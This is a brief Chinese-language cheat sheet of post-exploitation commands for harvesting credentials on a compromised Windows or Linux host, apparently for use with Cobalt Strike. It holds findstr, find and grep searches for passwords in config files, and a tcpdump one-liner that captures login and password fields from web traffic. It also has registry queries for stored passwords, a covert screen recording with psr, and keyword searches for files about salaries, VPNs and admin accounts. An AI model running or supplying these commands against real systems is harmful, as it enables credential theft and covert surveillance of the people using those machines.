密码搜集

cs里的插件能自动搜集很多软件的密码这里记录一些命令

检索文件绝对路径

dir /s /b c:|findstr "index.php"

查询文件内的配置信息

findstr /c:"user=" /c:"pass=" /c:"uid=" /c:"pwd=" /si *.ini *.conf *.jsp *.php web.config

linux下搜索

find ./ -name *.php
find ./ -name *.php | xargs  egrep -i "user|pass"

假设拿到shell 不知道数据库的加密方式解不开hash 可以尝试抓跟网站交互的数据包

tcpdump -i eth0 -s 0 -nnA 'tcp dst port 80 and host 192.168.1.108' | egrep -i 'login=|password=' --color=auto --line-buffered -B20

查注册表（作用不大）

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f username /t REG_SZ /s
reg query HKCU /f username /t REG_SZ /s

屏幕录屏

shell psr /start /output c:\Windows\Logs\test.zip /gui 0
shell psr /stop  	#停止

本机密码收集

敏感文件收集

windows

dir /a /s /b D:\"*conf*"
dir /s /b "*密码*" "*登录*" "*资产*" "*VPN*" "*Svn*" "*Git*" "*交接*" "*离职*" "*网络*" "*后台*" "*拓扑*" "*邮箱*" "*工资*" "*管理员*" "*巡检*"
findstr /I /c:"user=" /c:"pass=" /c:"login=" /c:"uid=" /c:"pwd="  /si *.conf *.asp *.php *.jsp *.aspx *.cgi *.xml *.ini *.inf *.txt *.cgi

linux

find / -name "*.properties" | xargs egrep -i "user|pass|pwd|uname|login|db_"
grep -rli "user|pass|pwd|uname|login|db_" ./